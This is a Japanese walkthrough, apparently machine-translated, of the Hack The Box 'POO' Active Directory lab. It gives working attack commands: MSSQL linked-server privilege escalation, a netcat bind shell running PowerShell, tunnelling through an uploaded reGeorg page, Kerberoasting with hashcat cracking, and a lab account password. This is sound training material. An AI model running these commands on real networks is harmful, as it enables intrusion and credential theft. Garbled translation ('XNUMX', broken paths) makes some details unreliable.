ハックザボックスエンドゲーム。 実験室専門攻撃作戦の通過。 ペンテストアクティブディレクトリ

この記事では、機械だけでなく、現場からのミニ実験室全体の通過を分析します ハックザボックス.

説明に記載されているように、POO は、小規模な Active Directory 環境での攻撃のすべての段階でスキルをテストするように設計されています。 目標は、プロセス内で 5 つのフラグを収集することで、アクセス可能なホストを侵害し、権限を昇格させ、最終的にはドメイン全体を侵害することです。

研究室への接続はVPN経由です。 情報セキュリティについてある程度知っている人々とのプライベート ネットワークに接続することになるため、稼働中のコンピュータや重要なデータが保存されているホストからは接続しないことをお勧めします 🙂

組織情報
新しい記事、ソフトウェア、その他の情報を知ることができるように、 テレグラムのチャンネル и あらゆる問題について話し合うグループ IIKBのエリアにあります。 個人的なリクエスト、質問、提案、推奨事項も 拝見して皆様にお返事させていただきます。.

すべての情報は教育目的のみに提供されます。 この文書の作成者は、この文書を学習した結果得られた知識や方法を使用した結果、誰かに生じた損害については一切の責任を負いません。

イントロ

このエンドゲームは 5 台のマシンで構成され、XNUMX つのフラグが含まれています。

使用可能なホストの説明とアドレスも示されます。

さあ始めましょう！

偵察旗

このマシンの IP アドレスは 10.13.38.11 で、これを /etc/hosts に追加します。
10.13.38.11 poo.htb

最初のステップは、開いているポートをスキャンすることです。 nmapで全ポートをスキャンすると時間がかかるので、まずはmasscanでスキャンしてみます。 tun0 インターフェイスからすべての TCP ポートと UDP ポートを 500pps でスキャンします。

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

ここで、ポート上で実行されているサービスに関する詳細情報を取得するために、-A オプションを使用してスキャンを実行してみましょう。

nmap -A poo.htb -p80,1433

したがって、IIS サービスと MSSQL サービスが存在します。 この場合、ドメインとコンピュータの実際の DNS 名を調べます。 Web サーバーでは、IIS ホームページが表示されます。

ディレクトリを繰り返し処理してみましょう。 これにはゴバスターを使います。 パラメータでは、ストリーム 128 (-t)、URL (-u)、辞書 (-w)、および関心のある拡張子 (-x) の数を指定します。

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

したがって、/admin ディレクトリに対する HTTP 認証と、.DS_Store デスクトップ サービス ストレージ ファイルが利用可能になります。 .DS_Store は、ファイルのリスト、アイコンの場所、選択した背景画像など、フォルダーのユーザー設定を保存するファイルです。 このようなファイルは、Web 開発者の Web サーバー ディレクトリに保存される可能性があります。 したがって、ディレクトリの内容に関する情報を取得します。 このために使用できます DS_Store クローラー.

python3 dsstore_crawler.py -i http://poo.htb/

ディレクトリの内容を取得します。 ここで最も興味深いのは /dev ディレクトリで、そこから 6 つのブランチにソース ファイルと db ファイルが表示されます。 ただし、サービスが IIS ShortName に対して脆弱である場合は、ファイル名とディレクトリ名の最初の XNUMX 文字を使用できます。 次を使用してこの脆弱性を確認できます IIS ショートネーム スキャナー.

そして、「poo_co」で始まるテキスト ファイルが XNUMX つ見つかります。 次に何をすればよいのか分からず、単にディレクトリの辞書から「co」で始まるすべての単語を選択しました。

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

そして wfuzz を繰り返します。

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

そして、適切な言葉を見つけてください！ このファイルを確認し、資格情報を保存します (DBNAME パラメーターから判断すると、資格情報は MSSQL からのものです)。

旗を手渡し、20％前進します。

え、フラグ

MSSQL に接続し、DBeaver を使用します。

このデータベースには興味深いものが何も見つかりません。SQL エディターを作成してユーザーが何であるかを確認してみましょう。

SELECT name FROM master..syslogins;

ユーザーは XNUMX 人います。 権限を確認してみましょう。

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

したがって、特権はありません。 リンクされたサーバーを見てみましょう。このテクニックについて詳しく書きました ここで.

SELECT * FROM master..sysservers;

そこで、別の SQL Server を見つけます。 openquery() を使用して、このサーバーでのコマンドの実行を確認してみましょう。

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

さらに、クエリ ツリーを構築することもできます。

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

実際、リンク サーバーにリクエストを行うと、そのリクエストは別のユーザーのコンテキストで実行されます。 リンク サーバー上でどのようなユーザー コンテキストを実行しているかを見てみましょう。

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

次に、リンクされたサーバーから私たちのサーバーへのリクエストがどのようなコンテキストで実行されるかを見てみましょう。

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

したがって、これはすべての権限が必要な DBO コンテキストです。 リンクサーバーからのリクエストの場合の権限を確認してみましょう。

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

ご覧のとおり、私たちにはすべての特権があります。 このように管理者を作成しましょう。 ただし、openquery を使用することはできません。EXECUTE AT を使用して実行しましょう。

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

次に、新しいユーザーの資格情報を使用して接続し、新しいフラグ データベースを観察します。

この旗を渡してさらに進んでいきます。

バックトラックフラグ

MSSQL を使用してシェルを取得しましょう。私は impacket パッケージの mssqlclient を使用しています。

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

パスワードを取得する必要がありますが、最初にすでに出会っているのはサイトです。 したがって、Web サーバーの設定が必要です (便利なシェルをスローすることは不可能です。ファイアウォールが機能しているようです)。

しかし、アクセスは拒否されます。 MSSQL からファイルを読み取ることはできますが、必要なのは、どのようなプログラミング言語が構成されているかを知ることだけです。 そして、MSSQL ディレクトリに Python があることがわかります。

その後、web.config ファイルを読み取るのに問題はありません。

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

資格情報が見つかったら、/admin に移動してフラグを選択します。

足場フラグ

実際、ファイアウォールを使用すると不便な点もありますが、ネットワーク設定を見てみると、IPv6 プロトコルも使用されていることがわかります。

このアドレスを /etc/hosts に追加します。
dead:babe::1001 poo6.htb
もう一度ホストをスキャンしてみましょう。ただし、今回は IPv6 経由です。

また、WinRM サービスは IPv6 経由で利用できます。 見つかった認証情報を使用して接続しましょう。

デスクトップに旗があるので、それを渡します。

P00されたフラグ

ホストを偵察した後、 ウィンピース 特別なことは何も見つかりません。 その後、資格情報を再度探すことにしました (このトピックについても書きました) статью）。 しかし、WinRM 経由でシステムからすべての SPN を取得できませんでした。

setspn.exe -T intranet.poo -Q */*

MSSQL 経由でコマンドを実行してみましょう。

このようにして、ユーザー p00_hr と p00_adm の SPN を取得します。これは、これらのユーザーが Kerberoasting などの攻撃に対して脆弱であることを意味します。 つまり、パスワードのハッシュを取得できます。

まず、MSSQL ユーザーに代わって安定したシェルを取得する必要があります。 ただし、アクセスが制限されているため、ホストとの接続はポート 80 と 1433 経由でのみ行われます。 ただし、ポート 80 を介してトラフィックをトンネリングすることは可能です。 このために私たちは使用します 次の申請。 トンネル.aspx ファイルを Web サーバーのホーム ディレクトリ (C: inetpubwwwroot) にアップロードしましょう。

しかし、アクセスしようとすると 404 エラーが発生し、*.aspx ファイルが実行されないことを意味します。 これらの拡張子のファイルを実行するには、次のように ASP.NET 4.5 をインストールします。

dism /online /enable-feature /all /featurename:IIS-ASPNET45

そして、tunnel.aspx にアクセスすると、すべての準備ができているという答えが得られます。

トラフィックを中継するアプリケーションのクライアント部分を起動しましょう。 ポート 5432 からのすべてのトラフィックをサーバーに転送します。

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

また、プロキシチェーンを使用して、プロキシ経由でアプリケーションのトラフィックを送信します。 このプロキシを /etc/proxychains.conf 設定ファイルに追加しましょう。

それでは、プログラムをサーバーにアップロードしましょう netcat、安定したバインドシェルとスクリプトを作成します。 ケルベロストを呼び出す、これを使用して Kerberoasting 攻撃を実行します。

ここで、MSSQL を通じてリスナーを起動します。

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

そして、プロキシを介して接続します。

proxychains rlwrap nc poo.htb 4321

そしてハッシュを取得しましょう。

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

次に、これらのハッシュを反復処理する必要があります。 Rockyou にはパスワード データ辞書がなかったため、Seclists で提供されているすべてのパスワード辞書を使用しました。 列挙には hashcat を使用します。

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

そして、両方のパスワードが見つかります。最初のパスワードは dutch_passwordlist.txt 辞書にあり、XNUMX 番目のパスワードは Keyboard-Combinations.txt にあります。

ユーザーが XNUMX 人いるので、ドメイン コントローラーに移動します。 まずは彼の住所を調べてみましょう。

ドメイン コントローラーの IP アドレスがわかりました。 ドメインのすべてのユーザーと、そのうちの誰が管理者であるかを調べてみましょう。 情報を取得するスクリプト PowerView.ps1 をダウンロードします。 次に、-s パラメータにスクリプトのあるディレクトリを指定して、evil-winrm を使用して接続します。 そして、PowerView スクリプトをロードするだけです。

これで、そのすべての機能にアクセスできるようになりました。 p00_adm ユーザーは特権ユーザーのように見えるため、そのコンテキストで作業します。 このユーザーの PSCredential オブジェクトを作成しましょう。

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

これで、Creds を指定したすべての Powershell コマンドが p00_adm に代わって実行されるようになります。 ユーザーのリストと AdminCount 属性を表示してみましょう。

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

したがって、私たちのユーザーは本当に恵まれています。 彼がどのグループに属しているかを見てみましょう。

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

最後に、ユーザーがドメイン管理者であることを確認します。 これにより、ドメイン コントローラーにリモートでログオンする権利が与えられます。 トンネルを使用して WinRM でログインしてみましょう。 evil-winrm を使用するときに reGeorg によって発行されるエラーに混乱しました。

次に、別のより簡単な方法を使用します。 脚本 WinRM に接続します。 接続パラメータを開いて変更します。

私たちは接続しようとしますが、私たちはシステム内にいます。

しかし旗がない。 次に、ユーザーを見てデスクトップを確認します。

mr3ks でフラグを見つけ、研究所は 100% 完成しました。

それで全部です。 フィードバックとして、この記事から何か新しいことを学んだかどうか、役に立ったかどうかについてコメントしてください。

から参加できます Telegram。 そこでは、興味深い資料、統合されたコース、ソフトウェアが見つかります。 IT のさまざまな分野を理解している人々が集まるコミュニティを集めましょう。そうすれば、IT や情報セキュリティの問題についていつでもお互いに助け合うことができます。

出所： habr.com